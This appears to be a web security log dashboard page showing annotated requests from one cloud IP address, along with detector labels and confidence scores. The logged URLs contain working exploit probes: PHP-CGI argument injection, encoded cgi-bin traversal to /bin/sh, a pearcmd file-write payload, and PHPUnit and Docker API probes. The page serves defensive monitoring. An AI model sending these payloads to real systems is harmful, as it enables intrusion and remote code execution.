Log Explorer

Fact drill-down for 150.136.76.116

Risk 19 LOW Scope All time All-time facts 198 In-scope 198 Filtered 198 Seen 2025-04-19 → 2025-05-19

Reset (all-time)

Active (none) Clear

Faceted filters (facts-based) exact core + snapshot + optional start/end

Annotation facets

HTTP facets

Snapshot facets

Custom time window (optional override)

Provide start/end to scope time explicitly (overrides days). Leave blank for all-time.

Tip: keep windows tight when you need speed, but the default is fact-complete.

Top annotators (facts, in-scope)

base 106 trav 35 scan_velocity 29 sfp 12 ua 8 proto 4 cmdi 4

Top labels (facts, in-scope)

observed 106 trav 35 scan_velocity 29 sensitive_file 12 ua 8 proto 4 cmdi 4

Click a pill to apply it as a filter.

Annotated access events

Showing page 1 / 4 — total 198 rows

← Prev Next →

# 2025-05-19 17:16:06 event 8042711 GET 404 bytes 28510

ann base label observed

Request event observed

/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

referer

Custom-AsyncHttpClient

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

referer

Custom-AsyncHttpClient

summary

event observed

details

—

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-19 17:16:04 event 8042705 POST 404 bytes 28510

ann trav 30 label trav

Request Path traversal / LFI indicator detected

/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input

referer

Custom-AsyncHttpClient

Annotation facts

label

trav

rule

trav:wrapper

conf

94.00

details

Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.

More (full fields + snapshot) expand

url

/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input

referer

Custom-AsyncHttpClient

summary

Path traversal / LFI indicator detected

details

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-19 17:16:04 event 8042705 POST 404 bytes 28510

ann base label observed

Request event observed

/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input

referer

Custom-AsyncHttpClient

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input

referer

Custom-AsyncHttpClient

summary

event observed

details

—

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-19 17:16:01 event 8042693 POST 301 bytes 178

ann trav 30 label trav

Request Path traversal / LFI indicator detected

/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input

referer

Custom-AsyncHttpClient

Annotation facts

label

trav

rule

trav:wrapper

conf

94.00

details

More (full fields + snapshot) expand

url

/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input

referer

Custom-AsyncHttpClient

summary

Path traversal / LFI indicator detected

details

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-19 17:16:01 event 8042693 POST 301 bytes 178

ann base label observed

Request event observed

/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input

referer

Custom-AsyncHttpClient

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input

referer

Custom-AsyncHttpClient

summary

event observed

details

—

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-19 17:15:59 event 8042685 POST 400 bytes 166

ann ua 8 label ua

Request Very short User-Agent string

/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh

referer

Annotation facts

label

rule

ua:very_short

conf

65.00

details

Short/generic UAs are common in basic scripts and commodity automation.

More (full fields + snapshot) expand

url

/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh

referer

summary

Very short User-Agent string

details

Short/generic UAs are common in basic scripts and commodity automation.

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-19 17:15:59 event 8042685 POST 400 bytes 166

ann trav 26 label trav

Request Path traversal / LFI indicator detected

/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh

referer

Annotation facts

label

trav

rule

trav:mixed_separators

conf

90.00

details

More (full fields + snapshot) expand

url

/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh

referer

summary

Path traversal / LFI indicator detected

details

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-19 17:15:59 event 8042685 POST 400 bytes 166

ann trav 28 label trav

Request Path traversal / LFI indicator detected

/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh

referer

Annotation facts

label

trav

rule

trav:dotdot_slash

conf

92.00

details

More (full fields + snapshot) expand

url

/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh

referer

summary

Path traversal / LFI indicator detected

details

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-19 17:15:59 event 8042685 POST 400 bytes 166

ann trav 30 label trav

Request Path traversal / LFI indicator detected

/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh

referer

Annotation facts

label

trav

rule

trav:encoded_dotdot

conf

93.00

details

More (full fields + snapshot) expand

url

/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh

referer

summary

Path traversal / LFI indicator detected

details

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-19 17:15:59 event 8042685 POST 400 bytes 166

ann sfp 34 label sensitive_file

Request Directory traversal indicator

/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh

referer

Annotation facts

label

sensitive_file

rule

sfp:traversal

conf

86.00

details

Traversal sequences were present (raw or encoded). Snippet='/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh'

More (full fields + snapshot) expand

url

/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh

referer

summary

Directory traversal indicator

details

Traversal sequences were present (raw or encoded). Snippet='/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh'

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-19 17:15:59 event 8042685 POST 400 bytes 166

ann proto 12 label proto

Request Malformed percent-encoding in request target

/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh

referer

Annotation facts

label

proto

rule

proto:bad_percent_encoding

conf

72.00

details

A '%' not followed by two hex digits was detected. Often caused by fuzzers/scanners or broken clients; sometimes used for evasions.

More (full fields + snapshot) expand

url

/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh

referer

summary

Malformed percent-encoding in request target

details

A '%' not followed by two hex digits was detected. Often caused by fuzzers/scanners or broken clients; sometimes used for evasions.

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-19 17:15:59 event 8042685 POST 400 bytes 166

ann base label observed

Request event observed

/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh

referer

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh

referer

summary

event observed

details

—

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-19 17:15:57 event 8042675 POST 400 bytes 166

ann ua 8 label ua

Request Very short User-Agent string

/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh

referer

Annotation facts

label

rule

ua:very_short

conf

65.00

details

Short/generic UAs are common in basic scripts and commodity automation.

More (full fields + snapshot) expand

url

/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh

referer

summary

Very short User-Agent string

details

Short/generic UAs are common in basic scripts and commodity automation.

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-19 17:15:57 event 8042675 POST 400 bytes 166

ann trav 26 label trav

Request Path traversal / LFI indicator detected

/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh

referer

Annotation facts

label

trav

rule

trav:mixed_separators

conf

90.00

details

More (full fields + snapshot) expand

url

/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh

referer

summary

Path traversal / LFI indicator detected

details

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-19 17:15:57 event 8042675 POST 400 bytes 166

ann trav 28 label trav

Request Path traversal / LFI indicator detected

/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh

referer

Annotation facts

label

trav

rule

trav:dotdot_slash

conf

92.00

details

More (full fields + snapshot) expand

url

/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh

referer

summary

Path traversal / LFI indicator detected

details

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-19 17:15:57 event 8042675 POST 400 bytes 166

ann sfp 34 label sensitive_file

Request Directory traversal indicator

/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh

referer

Annotation facts

label

sensitive_file

rule

sfp:traversal

conf

86.00

details

Traversal sequences were present (raw or encoded). Snippet='/cgi-bin/../../../../../../../../../../bin/sh'

More (full fields + snapshot) expand

url

/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh

referer

summary

Directory traversal indicator

details

Traversal sequences were present (raw or encoded). Snippet='/cgi-bin/../../../../../../../../../../bin/sh'

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-19 17:15:57 event 8042675 POST 400 bytes 166

ann base label observed

Request event observed

/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh

referer

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh

referer

summary

event observed

details

—

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-17 08:46:12 event 16731445 GET 404 bytes 28510

ann base label observed

Request event observed

/containers/json

referer

Custom-AsyncHttpClient

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/containers/json

referer

Custom-AsyncHttpClient

summary

event observed

details

—

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-17 08:46:12 event 16731444 GET 404 bytes 28510

ann base label observed

Request event observed

/containers/json

referer

Custom-AsyncHttpClient

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/containers/json

referer

Custom-AsyncHttpClient

summary

event observed

details

—

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-17 08:46:11 event 16731443 GET 404 bytes 28510

ann trav 26 label trav

Request Path traversal / LFI indicator detected

/index.php?lang=../../../../../../../../tmp/index1

referer

Custom-AsyncHttpClient

Annotation facts

label

trav

rule

trav:mixed_separators

conf

90.00

details

More (full fields + snapshot) expand

url

/index.php?lang=../../../../../../../../tmp/index1

referer

Custom-AsyncHttpClient

summary

Path traversal / LFI indicator detected

details

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-17 08:46:11 event 16731443 GET 404 bytes 28510

ann trav 28 label trav

Request Path traversal / LFI indicator detected

/index.php?lang=../../../../../../../../tmp/index1

referer

Custom-AsyncHttpClient

Annotation facts

label

trav

rule

trav:dotdot_slash

conf

92.00

details

More (full fields + snapshot) expand

url

/index.php?lang=../../../../../../../../tmp/index1

referer

Custom-AsyncHttpClient

summary

Path traversal / LFI indicator detected

details

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-17 08:46:11 event 16731441 GET 404 bytes 28510

ann trav 26 label trav

Request Path traversal / LFI indicator detected

/index.php?lang=../../../../../../../../tmp/index1

referer

Custom-AsyncHttpClient

Annotation facts

label

trav

rule

trav:mixed_separators

conf

90.00

details

More (full fields + snapshot) expand

url

/index.php?lang=../../../../../../../../tmp/index1

referer

Custom-AsyncHttpClient

summary

Path traversal / LFI indicator detected

details

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-17 08:46:11 event 16731441 GET 404 bytes 28510

ann trav 28 label trav

Request Path traversal / LFI indicator detected

/index.php?lang=../../../../../../../../tmp/index1

referer

Custom-AsyncHttpClient

Annotation facts

label

trav

rule

trav:dotdot_slash

conf

92.00

details

More (full fields + snapshot) expand

url

/index.php?lang=../../../../../../../../tmp/index1

referer

Custom-AsyncHttpClient

summary

Path traversal / LFI indicator detected

details

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-17 08:46:11 event 16731443 GET 404 bytes 28510

ann sfp 34 label sensitive_file

Request Directory traversal indicator

/index.php?lang=../../../../../../../../tmp/index1

referer

Custom-AsyncHttpClient

Annotation facts

label

sensitive_file

rule

sfp:traversal

conf

86.00

details

Traversal sequences were present (raw or encoded). Snippet='/index.php?lang=../../../../../../../../tmp/index1'

More (full fields + snapshot) expand

url

/index.php?lang=../../../../../../../../tmp/index1

referer

Custom-AsyncHttpClient

summary

Directory traversal indicator

details

Traversal sequences were present (raw or encoded). Snippet='/index.php?lang=../../../../../../../../tmp/index1'

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-17 08:46:11 event 16731441 GET 404 bytes 28510

ann sfp 34 label sensitive_file

Request Directory traversal indicator

/index.php?lang=../../../../../../../../tmp/index1

referer

Custom-AsyncHttpClient

Annotation facts

label

sensitive_file

rule

sfp:traversal

conf

86.00

details

Traversal sequences were present (raw or encoded). Snippet='/index.php?lang=../../../../../../../../tmp/index1'

More (full fields + snapshot) expand

url

/index.php?lang=../../../../../../../../tmp/index1

referer

Custom-AsyncHttpClient

summary

Directory traversal indicator

details

Traversal sequences were present (raw or encoded). Snippet='/index.php?lang=../../../../../../../../tmp/index1'

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-17 08:46:11 event 16731443 GET 404 bytes 28510

ann base label observed

Request event observed

/index.php?lang=../../../../../../../../tmp/index1

referer

Custom-AsyncHttpClient

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/index.php?lang=../../../../../../../../tmp/index1

referer

Custom-AsyncHttpClient

summary

event observed

details

—

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-17 08:46:11 event 16731441 GET 404 bytes 28510

ann base label observed

Request event observed

/index.php?lang=../../../../../../../../tmp/index1

referer

Custom-AsyncHttpClient

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/index.php?lang=../../../../../../../../tmp/index1

referer

Custom-AsyncHttpClient

summary

event observed

details

—

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-17 08:46:10 event 16731438 GET 404 bytes 28510

ann trav 26 label trav

Request Path traversal / LFI indicator detected

/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php

referer

Custom-AsyncHttpClient

Annotation facts

label

trav

rule

trav:mixed_separators

conf

90.00

details

More (full fields + snapshot) expand

url

/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php

referer

Custom-AsyncHttpClient

summary

Path traversal / LFI indicator detected

details

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-17 08:46:10 event 16731438 GET 404 bytes 28510

ann trav 28 label trav

Request Path traversal / LFI indicator detected

/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php

referer

Custom-AsyncHttpClient

Annotation facts

label

trav

rule

trav:dotdot_slash

conf

92.00

details

More (full fields + snapshot) expand

url

/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php

referer

Custom-AsyncHttpClient

summary

Path traversal / LFI indicator detected

details

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-17 08:46:10 event 16731435 GET 404 bytes 28510

ann trav 26 label trav

Request Path traversal / LFI indicator detected

/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php

referer

Custom-AsyncHttpClient

Annotation facts

label

trav

rule

trav:mixed_separators

conf

90.00

details

More (full fields + snapshot) expand

url

/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php

referer

Custom-AsyncHttpClient

summary

Path traversal / LFI indicator detected

details

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-17 08:46:10 event 16731435 GET 404 bytes 28510

ann trav 28 label trav

Request Path traversal / LFI indicator detected

/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php

referer

Custom-AsyncHttpClient

Annotation facts

label

trav

rule

trav:dotdot_slash

conf

92.00

details

More (full fields + snapshot) expand

url

/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php

referer

Custom-AsyncHttpClient

summary

Path traversal / LFI indicator detected

details

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-17 08:46:10 event 16731438 GET 404 bytes 28510

ann sfp 34 label sensitive_file

Request Directory traversal indicator

/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php

referer

Custom-AsyncHttpClient

Annotation facts

label

sensitive_file

rule

sfp:traversal

conf

86.00

details

Traversal sequences were present (raw or encoded). Snippet='/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-creat'

More (full fields + snapshot) expand

url

/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php

referer

Custom-AsyncHttpClient

summary

Directory traversal indicator

details

Traversal sequences were present (raw or encoded). Snippet='/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-creat'

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-17 08:46:10 event 16731435 GET 404 bytes 28510

ann sfp 34 label sensitive_file

Request Directory traversal indicator

/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php

referer

Custom-AsyncHttpClient

Annotation facts

label

sensitive_file

rule

sfp:traversal

conf

86.00

details

Traversal sequences were present (raw or encoded). Snippet='/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-creat'

More (full fields + snapshot) expand

url

/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php

referer

Custom-AsyncHttpClient

summary

Directory traversal indicator

details

Traversal sequences were present (raw or encoded). Snippet='/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-creat'

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-17 08:46:10 event 16731438 GET 404 bytes 28510

ann base label observed

Request event observed

/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php

referer

Custom-AsyncHttpClient

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php

referer

Custom-AsyncHttpClient

summary

event observed

details

—

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-17 08:46:10 event 16731435 GET 404 bytes 28510

ann base label observed

Request event observed

/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php

referer

Custom-AsyncHttpClient

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php

referer

Custom-AsyncHttpClient

summary

event observed

details

—

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-17 08:46:10 event 16731438 GET 404 bytes 28510

ann cmdi 22 label cmdi

Request Command/file-injection indicator: cmdi:pipe_or_redirect

/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php

referer

Custom-AsyncHttpClient

Annotation facts

label

cmdi

rule

cmdi:pipe_or_redirect

conf

75.00

details

Pipe/redirect operators in a context that resembles command execution. Snippet='GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd& con'

More (full fields + snapshot) expand

url

/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php

referer

Custom-AsyncHttpClient

summary

Command/file-injection indicator: cmdi:pipe_or_redirect

details

Pipe/redirect operators in a context that resembles command execution. Snippet='GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd& con'

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-17 08:46:10 event 16731438 GET 404 bytes 28510

ann cmdi 28 label cmdi

Request Command/file-injection indicator: cmdi:op_plus_cmd

/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php

referer

Custom-AsyncHttpClient

Annotation facts

label

cmdi

rule

cmdi:op_plus_cmd

conf

88.00

details

Command separator/operator combined with a recognized command token. Snippet='GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd& con'

More (full fields + snapshot) expand

url

/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php

referer

Custom-AsyncHttpClient

summary

Command/file-injection indicator: cmdi:op_plus_cmd

details

Command separator/operator combined with a recognized command token. Snippet='GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd& con'

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-17 08:46:10 event 16731435 GET 404 bytes 28510

ann cmdi 22 label cmdi

Request Command/file-injection indicator: cmdi:pipe_or_redirect

/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php

referer

Custom-AsyncHttpClient

Annotation facts

label

cmdi

rule

cmdi:pipe_or_redirect

conf

75.00

details

Pipe/redirect operators in a context that resembles command execution. Snippet='GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd& con'

More (full fields + snapshot) expand

url

/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php

referer

Custom-AsyncHttpClient

summary

Command/file-injection indicator: cmdi:pipe_or_redirect

details

Pipe/redirect operators in a context that resembles command execution. Snippet='GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd& con'

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

# 2025-05-17 08:46:10 event 16731435 GET 404 bytes 28510

ann cmdi 28 label cmdi

Request Command/file-injection indicator: cmdi:op_plus_cmd

/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php

referer

Custom-AsyncHttpClient

Annotation facts

label

cmdi

rule

cmdi:op_plus_cmd

conf

88.00

details

Command separator/operator combined with a recognized command token. Snippet='GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd& con'

More (full fields + snapshot) expand

url

/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php

referer

Custom-AsyncHttpClient

summary

Command/file-injection indicator: cmdi:op_plus_cmd

details

Command separator/operator combined with a recognized command token. Snippet='GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd& con'

subnet

150.136.76.0/24

asn

31898 — Oracle Corporation

geo

United States, Virginia, Ashburn

org

Oracle Cloud Infrastructure (us-ashburn-1)

